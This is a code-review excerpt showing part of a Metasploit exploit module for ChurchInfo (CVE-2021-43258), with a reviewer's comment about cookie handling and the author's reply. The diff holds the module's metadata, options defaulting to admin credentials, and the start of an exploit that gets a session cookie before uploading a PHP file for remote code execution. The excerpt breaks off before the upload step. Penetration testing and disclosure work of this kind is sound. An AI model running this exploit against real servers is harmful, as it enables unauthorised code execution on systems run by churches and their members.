modules/exploits/multi/http/churchinfo_upload_exec.rb

```diff
@@ -0,0 +1,183 @@
+          This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.
+          By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the
+          ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and
+          then browsing to the location of the uploaded PHP file on the web server, arbitrary code
+          execution as the XXX user can be achieved.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'm4lwhere <m4lwhere@protonmail.com>' ],
+        'References' => [
+          ['URL', 'http://www.churchdb.org/'],
+          ['URL', 'http://sourceforge.net/projects/churchinfo/'],
+          ['CVE', '2021-43258']
+        ],
+        'Platform' => 'php',
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [['Automatic Targeting', { 'auto' => true }]],
+        'DisclosureDate' => '2021-10-30',
+        'DefaultTarget' => 0,
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_fs_delete_file
+            ]
+          }
+        },
+        'Notes' => {
+          'Stability' => ['CRASH_SAFE'],
+          'Reliability' => ['REPEATABLE_SESSION'],
+          'SideEffects' => ['ARTIFACTS_ON_DISK', 'IOC_IN_LOGS']
+        }
+      )
+    )
+    # Set the email subject and message if interested
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),
+        OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']),
+        OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Read this now!']),
+        OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Hello there!'])
+      ]
+    )
+  end
+
+  #
+  # The exploit method attempts a login, adds items to the cart, then creates the email attachment.
+  # Adding items to the cart is required for the server-side code to accept the upload.
+  #
+  def exploit
+    # Need to grab the PHP session cookie value first to pass to application
+    vprint_status('Gathering PHP session cookie')
+    if datastore['SSL'] == true
+      vprint_status('SSL is true, changing protocol to HTTPS')
+      proto_var = 'https'
+    else
+      vprint_status('SSL is false, leaving protocol as HTTP')
+      proto_var = 'http'
+    end
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'Default.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'Proto' => proto_var,
+        'Path' => datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + datastore['TARGETURI']
+      }
+    )
+
+    # Grab our assigned session cookie
+    cookie = res.get_cookies
+    vprint_good("PHP session cookie is #{cookie}")
```

Comment:
You can avoid needing to extract and pass the cookie yourself by using the `keep_cookies` option:
https://github.com/rapid7/metasploit-framework/blob/dcb42da2697cbcee910bc868eec7427c2a3e8aee/lib/msf/core/exploit/remote/http/moodle/login.rb#L19-L24

Reply:
Very cool, I was unaware of this option and have enabled it. Thanks for the heads up! I've intentionally left the code to verbose print the PHP session value to help with any troubleshooting, but properly access the `cookie_jar` in future requests.